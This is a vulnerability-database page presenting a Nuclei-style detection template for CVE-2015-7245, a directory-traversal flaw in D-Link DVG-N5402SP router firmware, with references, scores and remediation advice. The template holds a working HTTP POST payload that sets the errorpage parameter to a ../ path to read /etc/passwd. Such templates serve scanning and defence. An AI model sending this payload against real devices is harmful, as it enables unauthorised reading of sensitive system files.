Vulners
Lucene search
D-Link DVG-N5402SP - Local File Inclusion
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | D-Link DVGN5402SP - Multiple Vulnerabilities | 4 Feb 201600:00 | – | zdt |
 | D-Link DVG-N5402SP Directory Traversal Vulnerability | 22 Feb 201600:00 | – | cnvd |
 | CVE-2015-7245 | 24 Apr 201718:00 | – | cve |
 | CVE-2015-7245 | 24 Apr 201718:00 | – | cvelist |
 | D-Link DVGN5402SP - Multiple Vulnerabilities | 4 Feb 201600:00 | – | exploitdb |
 | D-Link DVGN5402SP - Multiple Vulnerabilities | 4 Feb 201600:00 | – | exploitpack |
 | CVE-2015-7245 | 24 Apr 201718:59 | – | nvd |
 | D-Link DVG-N5402SP Path Traversal / Information Disclosure | 3 Feb 201600:00 | – | packetstorm |
 | Directory traversal | 24 Apr 201718:59 | – | prion |
 | PT-2017-7165 · D Link · Dvg-N5402Sp | 24 Apr 201700:00 | – | ptsecurity |
10
id: CVE-2015-7245
info:
name: D-Link DVG-N5402SP - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
impact: |
An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.
remediation: |
Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.
reference:
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
- https://www.exploit-db.com/exploits/39409/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-7245
cwe-id: CWE-22
epss-score: 0.45479
epss-percentile: 0.98633
cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: d-link
product: dvg-n5402sp_firmware
tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link,vuln
http:
- raw:
- |
POST /cgibin/webproc HTTP/1.1
Host: {{Hostname}}
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a004730450220631dd9b0b56766a662574346abf352640f454211fca4985065559c57ef7ec2d3022100fc16d60ca3631664d1cc5e4adf52d50d5a80e561bcae37c9c9df5c5eed4a22b1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.45479